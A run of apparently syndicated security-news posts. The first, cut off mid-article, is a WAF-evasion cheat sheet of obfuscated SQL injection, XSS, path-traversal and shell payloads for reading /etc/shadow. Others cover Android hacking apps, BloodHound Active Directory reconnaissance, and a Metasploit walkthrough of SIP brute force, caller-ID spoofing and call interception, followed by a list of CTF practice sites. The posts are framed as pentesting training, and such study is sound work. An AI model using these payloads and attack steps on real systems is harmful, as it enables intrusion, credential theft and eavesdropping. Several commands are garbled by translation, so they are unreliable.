Attackers can also insert comments in the middle of the lines of attack. For example, / *! SELECT * / can be ignored by the WAF implementation, but passed to the target application and processed by the MySQL database.

Example in URL:

index.php?page_id=-1 %55nION/**/%53ElecT 1,2,3,4'union%a0select pass from users#

Example in URL:

index.php?page_id=-1 /*! UNION*/ /*! SELECT*/ 1,2,3

Double encoding method

WAF filters typically encode characters to protect a web application. Poorly designed filters can be evaded with relative ease using double coding, say pentesting experts.

Basic request:

http://example/cgi/../../winnt/system32/cmd.exe?/c+dir+c:

Obfuscated payload:

http://example/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:

Basic request:

<script>confirm()</script>

Obfuscated payload:

%253Cscript%253Econfirm()%253C%252Fscript%253E

Template obfuscation

Several command-line utilities use templates to work with multiple files globally. We can change these templates to run system commands.

Basic request:

/bin/cat /etc/passwd

Obfuscated payload:

/??? /?? t /??? /?? ff??

Characters used:

/ ? t s

Basic requests:

/bin/nc 127.0.0.1 443

Obfuscated payload:

/??? /n? 2130706433 443

Characters used:

/ ? n [0-9]

Dynamic loading technique

Programming languages have different templates and syntax for concatenation. According to pentesting experts, this allows you to create payloads that can evade various filters and rules.

Basic request:

<script>confirm()</script>

Obfuscated payload:

<script>eval('con'+'fi'+'rm()')</script>

Basic request:

/bin/cat /etc/shadow

Obfuscated payload:

/bi'n'''/c''at' /e'tc'/sh''ad'ow

Bash allows the concatenation of paths for execution.

Basic request:

<iframe/onload='this["src"]="javascript:confirm()"';>

Obfuscated payload:

<iframe/onload='this["src"]="jav"+"as&Tab;cr"+"ipt:con"+"fir"+"m()"';>

Junk character technique

These are simple payloads easily filtered by WAF. In some cases, adding some unwanted characters helps avoid detection, allowing pentesting experts to obfuscat regular expression firewalls.

Basic request:

<script>confirm()</script>

Obfuscated payload:

<script>+-+-1-+-+confirm() </script>

Basic request:

<BODY onload=confirm()>

Obfuscated payload:

<BODY onload!#$%&()*~+-_.,:;? @[/|]^'=confirm()>

Basic request:

<a href=javascript;alert()> ClickMe

WAF Evasion:

<aa aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe

Line break technique

Much regular expression filtering WAF effectively blocks multiple attempts. The line break technique (CR and LF) can break the firewall’s regular expression to bypass security measures.

Basic request:

<iframe src=javascript:confirm(hacker)">

Obfuscated payload:

<iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(hacker)">

Invalid uninitialized variable technique

Regular expression filters can be omitted by using uninitialized bash variables. This value is zero and acts as empty strings. Bash and Perl allow such interpretations.

• First-level obfuscation: Normal

Basic request:

/bin/cat /etc/shadow

Obfuscated payload:

/bin/cat$u /etc/shadow$u

• Second-level obfuscation: Position-based

Basic request:

/bin/cat /etc/shadow

Obfuscated payload:

$u/bin$u/cat$u $u/etc$u/shadow$u

• Third-level obfuscation: Random characters

Basic request:

/bin/cat /etc/passwd

Obfuscated payload:

$aaaaaa/bin$bbbbbb/cat$ccccccc $dddddd/etc$eeeeeee/passwd$fffffff

Tabs and line break

Tabs are often used to bypass firewalls, especially those based on regular expressions. Tabs can help break a WAF regular expression when the regular expression expects spaces instead of tabs.

Basic request:

<IMG SRC="javascript:confirm();">

Bypassing technique:

<IMG SRC=" javascript:confirm();">

Variant:

<IMG SRC=" jav ascri pt:confirm ();">

Basic request:

http://test.com/test?id=1 union select 1,2,3

Bypassing technique

http://test.com/test?id=1%09union%23%0A%0Dselect%2D%2D%0A%0D1,2,3

Basic request:

<iframe src=javascript:confirm()></iframe>

Obfuscated payload:

<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:c&Tab;o&Tab;n&Tab;f&Tab;i&Tab;r&Tab;m&Tab;%28&Tab;%29></iframe>

Token Breakers

Token attacks are based on trying to break the logic of splitting a request into tokens using means of token protection, pentesting experts say. Token breakers are tokens that allow you to influence the correspondence between a string element and a specific token. Our request must remain valid when using token crackers.

Our payload:

?id='-sqlite_version() UNION SELECT passwords FROM users –

Example: unknown context for the pentester.

First payload:

?id=12);D ROP TABLE users –

Second payload:

?id=133) INTO OUTFILE 'xxx' –

Obfuscation technique in other formats

Many web applications support different types of encoding and can interpret it. We will always need to obfuscat the payload in a non-WAF-compliant format, but the server can forward our payload.

IIS case:

IIS 6, 7.5, 8, and 10 can be interpreted as IBM037.

Send parameters encoded with:

• Original request:

POST /example.aspx?id7=sometext HTTP/1.1
HOST: target.org
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 27
id2='union all select * from users—

• Obfuscated request with URL encoding:

POST /example.aspx?%89%84%F7=%A2%95%94%86%A3%88%89%95%87 HTTP/1.1
HOST: target.org
Content-Type: application/x-www-form-urlencoded; charset=ibm037
Content-Length: 127
%89%84%F2=%7D%A4%95%89%97%95%40%81%93%94%40%A2%85%93%85%84%A3%40%5C%40%86%99

Finally, pentesting experts have a number of useful tips during these safety tests:

• Always try to address the problem as comprehensively as possible
• Try different coding techniques. Depending on the case, some might work better than after
• Take the time to verify your DNS records, as only then will you be able to find errors successfully
• Don’t forget that any protection on web resources can be bypassed and WAF is not a panacea for all the problems faced by an online application
• Hackers don’t rest and are always looking for new methods to take control of affected resources, so the cybersecurity community can’t rest either

For further reports on vulnerabilities, pentesting, exploits, malware variants, cybersecurity risks and information security courses fell free to visit the International Institute of Cyber Security (IICS) websites, as well as the official platforms of technology companies.

The post How to hack and bypass a web application firewall WAF during penetrating testing appeared first on Information Security Newspaper | Hacking News.

In this article, pentesting specialists from the International Institute of Cyber Security (IICS) will show you the best 14 apps to perform basic security scans from a mobile device running Android operating system. It is important to note that it is possible to perform some hacking tasks from our smartphone; we only have to learn to distinguish between the really useful tools and the junk apps that abound on platforms like Google Play Store.

HACKING VIA SMARTPHONE TOOLS

Pentesting experts classify hacking apps for Android into the following categories:

• Web resource scanners: These are hacking tools to find vulnerabilities in web applications
• Combinations: Allow users to search for hardware and software vulnerabilities to exploit them. These tools let deploying tracking attacks, Man-in-The-Middle (MiTM) attacks, among other hacking variants
• Trackers: These are hacking apps to intercept and analyze target user’s traffic
• Help utilities: Support tools during pentesting
• Directories and search engines: Applications that perform auxiliary functions

Let’s look at some good examples of these tools.

WEB RESOURCE SCANNERS FOR ANDROID

Web application scanners are probably the most important mobile hacking resource, as mentioned by pentesting experts. Here are three applications that will allow you to find open management dashboards, reset passwords, as well as testing any website for XSS vulnerabilities, SQL injection capabilities, directory list compilation, and more.

Kayra the Pentester Lite

Kayra the Pentester Lite is a vulnerability scanner to analyze the configurations of a specific web server that attempts to obtain a list of directories and includes additional tools, such as hashing generators and AES decryptors, as mentioned by pentesting experts.

The application has simple and direct configurations. It supports HTTPS and validates TLS, plus it is capable of searching for XSS, brute force flaws and performing dictionary attacks. It can work in the background and in multithreaded mode. It contains the Google Hacks database and automatically detects known vulnerabilities. The free version is quite functional, but if you want to get rid of the ads the paid version is accessible. The latest version of Kayra the Pentester Lite (v1.4.0) requires only 4.7 MB and works on any Android 4 device without rooting.

DroidSQLi

DroidSQLi allows you to verify websites for SQL injection vulnerabilities in different variants:

• Normal SQL Injection: The classic version with the union ALL SELECT parameter step
• Error-based SQL injection: Conscious use of incorrect query syntax to receive an error message that reveals additional database parameters
• Blind SQL Injection: A series of queries that analyze true or false DBMS responses, allowing you to restore the database structure
• Time-based SQL injection: the formation of additional queries that cause the DBMS to be suspended for a certain period of time, making it possible to retrieve the data character by character

This utility automatically selects the injection method and also uses techniques to bypass query filtering. To start testing the site, you must manually search for the entry point. Typically, this is the address of a web page that contains a query such as Id x or P x, where X is a positive integer. In our example, the payload of the ID parameter looks like this:

id=(SELECT 4777 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(4777=4777,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

There are many websites that are vulnerable to SQL injection and it is best to find these flaws through a browser search.

This utility does not require a rooted smartphone and works on all Android versions later than 5.2.

Droidbug Admin Panel Finder FREE

This application searches management panels by default addresses of different CMSs. The result of this work does not always correspond to the actual state of things, as IDS and WAF are installed on popular web servers and have better security mechanisms. 

Despite this, on less popular sites with poorer security measures everything is very grim and you will find a valid admin panel in a matter of seconds. The paid version removes ads and unlocks the ability to use brute force attacks in a mixed pattern for sites with PHP/ASP/CGI/CFM/JS support.

The latest version of Droidbug Admin Panel Finder FREE needs only 6.4 MB and does not require rooted devices.

COMBINATIONS TO HACK FROM A SMARTPHONE

The Internet isn’t just about web applications. The following collection of hacking apps for Android will allow you to search for vulnerabilities in software and hardware, perform sniffing, MiTM attacks, and backdoors, among other variants.

cSploit

This is one of the most powerful tools for scanning networks and finding vulnerabilities on detected hosts. Experts can use cSploit to draw a network map and find information about all connected devices.

The tool also allows you to determine the IP/MAC and provider, determine the operating system, look for vulnerabilities using the Metasploit RPCd framework and obtain passwords using brute force.

The latest version (v1.6.6 RC2) requires 3.5 MB and works on all Android versions later than 2.3, although it should be noted that cSploit requires a rooted device to properly work.

dSploit

If cSpoit worked for me smoothly, the last three versions of dSploit failed with an error almost immediately after release. Since developer Simone Margaritelli got a job at Zimperium, dSploit’s developments have become part of zAnti’s proprietary utility.

This utility requires a rooted Android device to work properly.

zANTI

This is a mobile pentesting app developed by Zimperium whose interface is divided into two parts: Scanning and Man-in-The-Middle (MiTM). A separate function allows users to identify vulnerabilities in the pentesters’ own smartphone.

This tool helps researchers to hack routers and get full access to them. Using MiTM attacks, zAnti detects unsecured items at three levels: in the operating system, applications, and device settings.

Finally, the tool prepares a report that contains explanations and tips on how to eliminate the detected flaws. Like other tools in this list, zANTI requires a rooted device.

SNIFFERS TO INTERCEPT TRAFFIC ON ANDROID

No pentester can do without good sniffer software, pentesting experts mention. Therefore, the next section of the article is dedicated to applications for intercepting and analyzing target user traffic.

Intercepter-NG

This is an advanced tracker for MiTM attacks. Intercepter-NG captures traffic and analyzes it on the fly, automatically detecting the authorization data contained.

The tool automatically detected data formats include passwords and hashes for the following protocols: AIM, BNC, CVS, DC++, FTP, HTTP, ICQ, IMAP, IRC, KRB5, LDAP, MRA, MYSQL, NTLM, ORACLE, POP3, RADIUS, SMTP, CALCETINES, Telnet, and VNC.

This app works on any Android device after v2.3, although it is important to mention that a rooted device is required, as mentioned by pentesting experts.

Packet Capture

This is a simple and legal TCP/UDP packet analyzer with the ability to intercept HTTPS sessions using MiTM. Using this tool does not require root rights as it uses Android’s built-in feature to send traffic over a VPN and forge an SSL certificate.

Packet capture works locally and does not perform ARP impersonation, session hijacking, or other attacks on external hosts. The application is positioned as a proxy to debug and downloaded from official websites.

HELP UTILITIES

While advanced pentesting utilities require rooted devices and other tools, there are simpler apps available in the Play Store and work on any smartphone, pentesting experts mentioned.

WPSapp

This program scans for WPS-enabled access points. After finding them, it tries testing the default pins on them. They are few and are known from router manufacturers’ manuals.

If the user did not change the default pin and did not turn off WPS, then the utility will review all known values and get WPA(2)-PSK, no matter how long and complex. The wireless password is displayed on the screen and is automatically saved in the WiFi settings of the attacking smartphone.

This tool works on all versions of Android after 5.1 and, although it does not necessarily require a rooted device, its operation could improve in case of using a jailbreak.

WiFiAnalyzer

This is a free and open source WiFi scanner very useful for detecting access points, knowing their parameters, measuring the signal strength and the distance between the different WiFi points.

WiFiAnalyzer allows you to view connection status, filter targets by signal strength, SSID, frequency used (2.4/5 GHz) and encryption type. You can also manually determine the least saturated channel using the available graphs, mentioned by pentesting specialists. Using this tool does not require a rooted device and works on any version of Android higher than v4.1.

Fing

Fing is a tool available on the Google Play Store to perform quick scans of the WiFi network to which our device is connected, identifying all users connected to this access point. Although the main use of this tool is to analyze our own WiFi network, Fing has other very attractive options.

Its Premium version can perform advanced analysis of the NetBIOS, UPNP, and Bonjour names, so you can fully identify the types of devices connected to a network, as well as having built-in ping and traceout utilities and sending Wake on LAN (WOL) requests, cybersecurity experts mention.

As it is an application available on official platforms, users do not require a rooted device to access all Fing features.

NetCut

This app detects all devices connected to a wireless network, as well as using advanced mechanisms to eject intruder devices or even restrict full access to the administrator’s WiFi network.

The app requires only 12 MB and works on any version above than 4.0, although a rooted device is required.

DIRECTORIES AND SEARCH ENGINES FOR PENTESTING               

Finally, we’ll address a couple of utilities that, while not directly related to hacking activities, perform helper functions to develop this kind of testing.

Droidbug Exploiting FREE

This utility was designed to find and download various types of exploits, grouped into two categories: local execution and remote execution. A separate group includes hardware and web vulnerabilities, as well as those used in denial of service (DoS) attacks.

This tool can be run by any version of Android greater than 4.0.3, although its execution requires a rooted device.

Pentest Chearsheet

According to pentesting specialists, this is a complete guide to running security tests according to The Open Web Application Security Project (OWASP) guidelines.

This guide includes a selection of links to hacking utilities tested and grouped according to the task in question, be it online scanning, vulnerability analysis, reverse tools, fuzzers, trackers, among others. This utility weighs only 2.2 MB and works on all Android versions greater than 4.0, plus no rooted device is required for use.

Remember that this material was developed for entirely academic purposes, so its misuse is not the responsibility of IICS. To learn more about computer security risks, malware, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) website.

The post Top 15 hacking tools for doing penetration testing from mobile phones appeared first on Information Security Newspaper | Hacking News.

Below, pentesting specialists from the International Institute of Cyber Security (IICS) will show you everything you need to know about using Bloodhound.

Installation

For this step, the factory version of Kali Linux is recommended. Enter the following command:

$ sudo install bloodhound

After the installation is complete, start the neo4j console. This step should work perfectly if the system is connected to the Internet and the repositories are registered correctly, as mentioned by pentesting experts:

$ sudo neo4j console

During startup, the following message will appear: “Remote control interface is available at: http://localhost: 7474/”. You can go through the browser available in Kali.

The tool will ask us to specify the username and password when connecting to the database. In this case, pentesting experts use “neo4j: neo4j”. There’s nothing else to do here. Now, in another window, run Bloodhound directly:

$ bloodhound

Log in and get to the application desktop.

The database is empty. Now we need to load ActiveDirectory data here.

Collect data from a domain

Next we will need a collector and a domain user account, as mentioned by pentesting experts:

• The collector can be downloaded here: https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors
• Take a domain account, whichever will be useful. The methods for obtaining valid accounts are different; as an option, listen to the responder and collect the NetNTLMv2 hash. You can also use SMB.

In this case, the Sharphound collector has been downloaded, which must be executed as a domain user. This can be done from a node that is not included in the scanned domain.

Open the command prompt as an administrator and run the following command:

runas /netonly /user:domain\login cmd.exe

User password required

If the credentials are correct, we will see a new command line session, the title of which will be the name of our user:

Later, in this session we will launch our collector specifying the domain name. It is important to note that we must have the DNS of this domain registered in order to resolve it by name.

sharpdound.exe -d domain name

When the data collection is complete, we will see the file with the corresponding name, indicated in the program output. This file is what we need to import to Bloodhound, pentesting specialists mention.

What information will we get?

Click the “Load Data” button in Bloodhound

Select the file created in the previous step and open it.

Next we will have to import the process.

When the import is complete, you can go to the “Analysis” tab and select the ready-made templates. Pentesting experts recommend dealing with “Finding shorter paths for domain administrators”; find the shortest path for the domain administrator.

The corresponding chart was created automatically. At a closer inspection, you may find something interesting. For example, a user **** USER9, who is a member of the Domain Admins group, was immediately discovered. In addition, it is not yet clear whether this is misconfigured or deliberately left, although this is a clear sample of how the tool works.

Bloodhound has many scripts and analysis prepared, mentioned by pentesting experts. You can create your own charts and mark such important nodes to complete the goal of this tutorial: capturing the target domain.

This is a tool that can be very useful to both administrators and pentesting experts; Remember that this article was prepared for academic purposes, so IICS is not responsible for the misuse that may be given to Bloodhound. To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post How to pentest an Active Directory server? appeared first on Information Security Newspaper | Hacking News.

This time, pentesting specialists from the International Institute of Cyber Security (IICS) will show you various methods to search for information about VoIP devices and prevent multiple attacks.

What is VoIP?

Before you begin, you can remember more details about this technology. According to pentesting experts, voip implementation allows audio calls to be made using an Internet connection instead of a conventional phone. Some VoIP gateway partners may allow you to call others who have a phone number, including local, long distance, mobile, and international numbers.

VoIP uses 5060 as a SIP signaling port by default. Used to register the phone (for example, Cisco, Polycom, etc.)

Among the most important features of VoIP are:

• Use of multiple lines
• Voicemail service
• Voice recording
• Call log
• Modular configurations

SIP Protocol

Session Initiation Protocol (SIP) allows users to establish communications, terminate, or modify voice or video calls. According to pentesting experts, voice or video traffic is transmitted via Real-Time Protocol (RTP). SIP is an application layer protocol that uses UDP or TCP for traffic. By default, SIP uses UDP/TCP port 5060 for uns encrypted traffic or 5061 for TLS encrypted traffic.

As we’ll see later, there are Man-in-The-Middle (MiTM) attack vectors for VoIP implementations. According to pentesting specialists, the login protocol is ASCII-based and is very similar to the HTTP protocol in that it uses a request/response model. Requests from a SIP client are made through SIP URI and AGI through a user agent.

SIP responses

We can understand the answers using the response code. The general categories of response codes are shown below:

• 1xx (information)
• 2xx (success)
• 3xx (Redirect)
• 4xx (failed requests)
• 5xx (web server cannot complete the request)
• 6xx (global errors)

SIP interoperability structure

A typical SIP interoperability structure consists of the following elements:

• Sender initiates INVITE request
• Recipient answers 100 (try calling)
• The sender starts calling by sending a 180 response (Ring)
• Receiver picks up phone and sends 200 successful responses (OK)
• ACK sent by the initiator
• The call starts using RTP
• A BYE request is sent to end the call

Real-Time Transport Protocol (RTP)

This is a network protocol for streaming audio and video. RTP is used in communications and entertainment systems that contain streaming media, such as mobile apps and video or conferences. The standard RTP port is 16384 to 32767, these ports are used for SIP calls. In this case, pentesting experts use UDP port range 10000-20000 for video, voice, and RTP media stream channels.

Configurations used in the wild

• Operating system: Kali Linux 2020.1
• IP address: 192.168.1.4
• Goal: Trixbox
• VoIP client: Zoiper
• Client IP address: 192.168.1.7

Setting up the Viproy VoIP kit

Before starting the pentesting process, we need to add the Viproy-VoIP kit to our Metasploit. We need to install some dependencies. We will first update our fonts and then install the following dependencies:

sudo apt update && sudo apt install -y git autoconf build-essential libcap-dev libpq-dev zliblg-dev libsqlite3-dev

Once all dependencies have been installed, it’s time to clone the Viproy Repository on the Kali Linux system. This contains the modules that we need to add to our Metasploit.

git clone https://github.com/fozavci/viproy-VoIPkit.git

Here we see that we have a lib directory and a module directory, as well as a kaliinstall script. Before running the script, pentesting experts recommend manually copying the contents of the lib directory and module directory to the lib directory and Metasploit modules, respectively.

cp lib/msf/core/auxiliary/* /usr/share/metasploit-framework/lib/msf/core/auxiliary/
cp modules/auxiliary/VoIP/viproy-VoIPkit* /usr/share/metasploit-framework/modules/auxiliary/VoIP/
cp modules/auxiliary/spoof/cisco/viproy-VoIPkit_cdp.rb /usr/share/metasploit-framework/modules/auxiliary/spoof/cisco/

Now we need to register the modules we copy to the Mixins files located in /usr/share/Metasploit-framework/lib/msf/core/Additional/.

echo "require 'msf/core/auxiliary/sip'" >> /usr/share/metasploit-framework/lib/msf/core/auxiliary/mixins.rb
echo "require 'msf/core/auxiliary/skinny'" >> /usr/share/metasploit-framework/lib/msf/core/auxiliary/mixins.rb
echo "require 'msf/core/auxiliary/msrp'" >> /usr/share/metasploit-framework/lib/msf/core/auxiliary/mixins.rb

This can also be done manually or with another text editor, mentioned by pentesting experts. Next, we clone the precompiled version of GitHub.

git clone https://github.com/fozavci/metasploit-framework-with-viproy-VoIPkit.git

Then we’ll go to the directory and install viproy using gem.

cd metasploit-framework-with-viproy/
gem install bundler
bundle install

It’ll take a little time. After that, we’ll have to reload the modules into Metasploit.

reload_all

This completes the installation of the Viproy Toolkit, so now you can start with pentesting on your target VoIP server. In a VoIP network, useful information can be found on VoIP gateways or servers, IP-PBX systems, VoIP client/phone software, and user extensions. Let’s take a look at some of the most commonly used fingerprinting and counting tools.

SIP Server Recognition

Using the Metasploit SIP scanner module to identify systems by providing a single IP or a range of IP addresses, pentesting experts will be able to scan all VoIP servers and their enabled parameters.

use auxiliary/scanner/sip/options
set rhosts 192.168.1.0/24
run

Here we can see that the scan throws a VoIP server running on 192.168.1.7. We can also see that it has a User-Agent like “Asterisk” and we can see that it has multiple requests enabled.

Brute force attack

It is then possible to use a brute force attack on the target server to extract your passwords. In this example, pentesting experts created a username dictionary and a password dictionary. The next step is to define the extensions, for which it is possible to select a range from 0000000 to 99999999 and finally launch the exploit.

use auxiliary/voip/viproy_sip_bruteforce
set rhosts 192.168.1.7
set minext 00000000
set maxext 99999999
set user_file /home/kali/user.txt
set pass_file /home/kali/pass.txt
exploit

Here we can see that 10 extensions have been extracted. We will need to make sure that the secret created for this extension is difficult to guess and thus prevent brute force attacks.

Additional work

Now it’s time to go one step further and record the extensions so we can initiate calls from the attacker’s computer. We chose extension 99999999. We discovered the secret of 999. Now all we had to do was provide the IP address, extension and secret of the server.

As soon as we started the support device, we received a 200 OK response from the server, which said the extension was registered with this IP address.

use auxiliary/voip/viproy_sip_register
set rhosts 192.168.1.7
set username 99999999
set password 999
run

Here we need to register the software as we do not have a trunk line, PSTN line or PRI line for outgoing calls. Therefore, we are testing the extension to invoke it.

Call spoofing

Here we can forge the caller ID at will. According to the pentesting experts, we need to set the login to true so that we can log in to the server with secret 999. We also need to set the numeric user to true so that it can accept numeric extensions.

use auxiliary/voip/viproy_sip_invite
set rhosts 192.168.1.7
set to 00000000
set from 99999999
set login true
set fromname hacker
set username 99999999
set password 999
set numeric users true
run

As soon as we launch the auxiliary device, we will see that there is a call from extension 999999999 to extension 00000000, which we configure in our Zoiper client. We can also see that we have the hacker’s caller ID that we have identified on the assistive device.

Record monitoring

We can monitor logs on the VoIP server, which contains information about all calls that were initiated, connected, and disconnected. According to the pentesting experts, you can check the default credentials. First we will connect the server using ssh and then we will run the following command to open the Asterisk console panel.

ssh 192.168.1.7
asterisk –rvvvvvvvvvvvvvvv

Track calls with Wireshark

When users initiate a phone call, hackers or researchers could monitor intercepted SIP traffic using Wireshark. To do this, start Wireshark and select the network adapter on which the VoIP server is running, and then we start capturing packets. If you pay more attention, you will see that there is a tab in the Wireshark menu called “Telephony”. The drop-down menu has the first option, VoIP Calls.

As soon as we click on VoIP calls, a window will open with all intercepted calls while listening. We see that there is a sequence of packets from one IP address to another.

If we click on the “Flow Sequence” button below, we can see the SIP handshakes we learned in the introduction. There are multiple SIP transactions in the SIP call flow. A SIP transaction consists of multiple requests and responses. To group them into a transaction, use the parameter CSeq: 103.

The first is to register the extension. After renewal, the log matches the session settings. Since extension 99999999, the session consists of an INVITE request from the user to 00000000. Immediately, the proxy sends TRYING 100 to stop transmission and redirect the request to extension 00000000.

Extension 00000000 sends an 180 ring when the phone starts ringing and also redirects the proxy to user A. Finally, an OK 200 message follows the receiving process (extension 000000000 answers the call). After calling the call server, try assigning the RTP ports and the RTP transport will start with the SDP configuration (ports, addresses, codecs, etc.). The last transaction corresponds to the end of the session. This is only done with a BYE request to the proxy and then redirected to extension 00000000.

The given user responds with an OK 200 message to confirm that the last message was received successfully. The call was initiated by a user named hacker with extension 99999999 to extension 00000000. The duration of the call and the current state can be seen in the previous example. Wireshark collected call packets and now we can hear the whole call. After disconnecting, we reproduce all the conversion of the phone call.

When we press the “Play Sequences” button, the output device is requested according to your laptop driver. Then we can click the Play button and listen to the conversation that occurred during this VoIP call.

Conclusions

Deploying a VoIP network without the right security controls is a very big risk. After a successful pentesting process, it becomes clear how risky the most popular configurations can be on these systems, so specialists recommend administrators seek advice to find the best ways to implement these systems. To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post How to do pentesting of VoIP servers? Step by step tutorial for hacking VoIP networks appeared first on Information Security Newspaper | Hacking News.

Finding vulnerabilities in the wild is a job that requires a lot of practice, so for security researchers the platforms and tools that allow them to develop their skills have become a very useful resource, although it is worth thinking about the best tools available.

This time, pentesting experts from the International Institute of Cyber Security (IICS) present a list of the best platforms for the practice and improvement of Capture the Flag (CTF) hacking and practice skills.

Hack the Box

This is one of the most important pentesting platforms in the world, with 127 vulnerable systems, 65 CTF tasks and multiple virtual implementations of hardcore AD.

Over the past few years Hack the Box has become a popular tool among pentesting experts, as it features a convenient web interface for active VM instance management, extensive technical support and a constantly updated list of vulnerable hosts.

Web-Security Academy

This is a platform developed by the creators of Burp Suite very popular among vulnerability bounty hunters.

OWASP Juice Shop

This is a web application written in JavaScript for pentesting training purposes. This platform is full of security flaws designed for users to exploit, as a fantastic cybersecurity training method.

Pentesterlab

This is a platform that provides online labs dedicated to the deployment of penetration tests. This website offers a variety of free activities for all those interested in honing their pentesting skills.

Root-Me

This website allows you to improve your hacking skills, with over 200 exercises and 50 virtual environments.

VulnHub

This is a large library of virtual machines that presents an environment with pentesting exercises for all tastes and knowledge levels.

TryHackMe

This is a recently created platform that allows cybersecurity enthusiasts to get acquainted with very interesting topics. Unlike other self-taught platforms, TryHackMe employs all kinds of techniques to facilitate learning, accompanied by users throughout the process.

Hacker 101

This is a free didactic site for any hacking enthusiast backed by the renowned HackerOne Vulnerability Rewards platform.

PentestIt Laboratories

This is a platform operated from Russia as a large pentesting lab, allowing ethical hackers to develop their skills consistently.

Pentester Academy

In exchange for $249 USD per month, users of this platform can have multiple hands-on activities to develop their skills as ethical hackers and pentesting experts.

Attack & Defense

With over 2100 hacking activities, Attack & Defense users will be able to 100% develop their pentesting capabilities.

CTF Antichat

This is a platform to complete tasks focused on exploiting vulnerabilities and identify indicators of engagement in the systems analyzed.

Avatao

Avatao has around 600 tasks and tutorials, more than 10 languages and a very complete vulnerability database.

Capture The Flag At UCF

This is another platform with multiple tasks in various areas of pentesting and ethical hacking.

Exploit Education

Exploit Education provides many resources that anyone can use to learn about vulnerability analysis, exploit development, pentesting, binary analysis and many other cybersecurity issues.

CSAW 365

This is a community of cybersecurity experts that allows you to share a lot of useful information for hacking.

Practical Pentest Labs

This is a large pentesting and exploiting lab on Windows systems available to those users willing to pay $43 USD per month.

Hack.Me

Hack.me is a great collection of vulnerable web applications to put your hacking skills into practice. All applications are provided by platform members and can each be launched in a sandbox.

XSS Game

This is a Google program designed to practice searching for XSS vulnerabilities.

Hackerdom

This platform was developed by the creators of RuCtf and contains a lot of useful material for pentesting experts.

Forkbomb

This Russian website contains thousands of free hacking tasks and is highly recommended for ethical hacking enthusiasts and pentesting specialists.

FreeHackQuest

This is another great teaching option for researchers to develop their skills.

Hacking-Lab

This is another online platform to learn about network security and ethical hacking. Hackers will be able to develop their forensic, cryptography and reverse engineering skills.

Enigma Group

Enigma Group contains over 300 hacking tasks with a focus on OWASP’s top 10 exploits. The site has nearly 48,000 active members and hosts Capture The Flag contests on a weekly basis.

CTFlearn

CTFlearn is a platform that allows hacking enthusiasts to put their skills into practice and compete with other researchers. This platform stores a wide set of free activities in all kinds of areas.

CTF Komodo

Komodo Consulting developed a platform completely focused on application hacking, allowing researchers to gain experience in vulnerability analysis.

RINGZER0 TEAM ONLINE

RingZer0 Team Online CTF offers over 200 challenges that will test your hacking skills in multiple areas, from cryptography, malware analysis to SQL injection and pentesting.

WeChall

This website contains about 61 active sites with Capture the Flag tasks divided into multiple skill difficulty levels.

Hack This Site

This is a free war games site for any user to test and improve their hacking skills, from basic tasks to complex analysis. This website also includes a forum for users to share their experiences with the ethical hacking and pentesting community.

W3CHALLS

W3Challs is a multitasking learning platform organized into a variety of categories, including hacking, war games, forensic analysis, cryptography, steganography and programming in multiple languages.

Game of Hacks

Game of Hacks displays a set of code snippets in a questionnaire with multiple options, among which users will need to identify the corresponding vulnerability.

WebGoat Project

This site is especially focused on training ethical hackers and pentesting experts. WebGoat is a cross-platform tool that can be run on any operating system with Apache Tomcat and Java SDK.

SQLI Labs

This platform allows users to test skills to work with SQL injections and has 65 tasks sorted according to their difficulty level.

PicoCTF

This is a very interesting resource with a lot of tasks and instructions for pentesting enthusiasts.

Defend the Web

This is an interactive security platform where researchers can improve their hacking skills. Defend the Web has over 60 levels of difficulty developing the most sophisticated skills.

OVERTHEWIRE

This is the ideal platform for all those interested in the theoretical study of information security regardless of their level of experience.

Even beginner hackers can find great guidance for solving practical issues in OverTheWire.

PWNABLE.TW

This is a war games website for hackers and pentesters to test their skills.

Command Challenge

This is a great option to develop your hacking skills.

IO

This is a war game from the creators of netgarage.org, a community where like-minded people share knowledge about security, artificial intelligence, virtual reality and more.

Google Gruyere

That python-written platform offers black hat and white hat pentesting and hacking capabilities for experts to learn to think like researchers and cybercriminals.

CTFTIME

While CTFtime is not a hacking site like the others on this list, it is a great resource to keep up with CTF competitions taking place around the world.

Mutillidae

This is a free open source platform for pentesting web applications. The application is provided as a PHP/MySQL instance for self-deployment.

Damn Vulnerable Web Application

This platform will be of great help to security professionals who wish to test their skills in a legal environment. Like the previous example, this application is provided as a PHP/MySQL instance for self-implementation.

bWAPP

This is a specialized open source web application that contains about 100 vulnerabilities classified according to the OWASP methodology.

Metasploitable 2

Metasploitable 2 is like a boxing bag for pentesters and programs like Metasploit and Nmap. All ports are open and all known vulnerabilities are present on this platform.

Metasploitable 3

This is a free virtual machine that allows users to simulate attacks using Metasploit. This is one of the favorite tools of cybersecurity specialists.

ThreatGEN: Red vs. Blue

This is an excellent platform to get into the world of war games and ethical hacking.

Hacknet

Hacknet is a hacking simulator with a computer terminal interface presented in the form of a fun role playing game.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) website.

The post 50 CTF(CAPTURE THE FLAG) & PENTESTING WEBSITES TO PRACTICE YOUR HACKING & CYBERSECURITY SKILLS IN 2021 appeared first on Information Security Newspaper | Hacking News.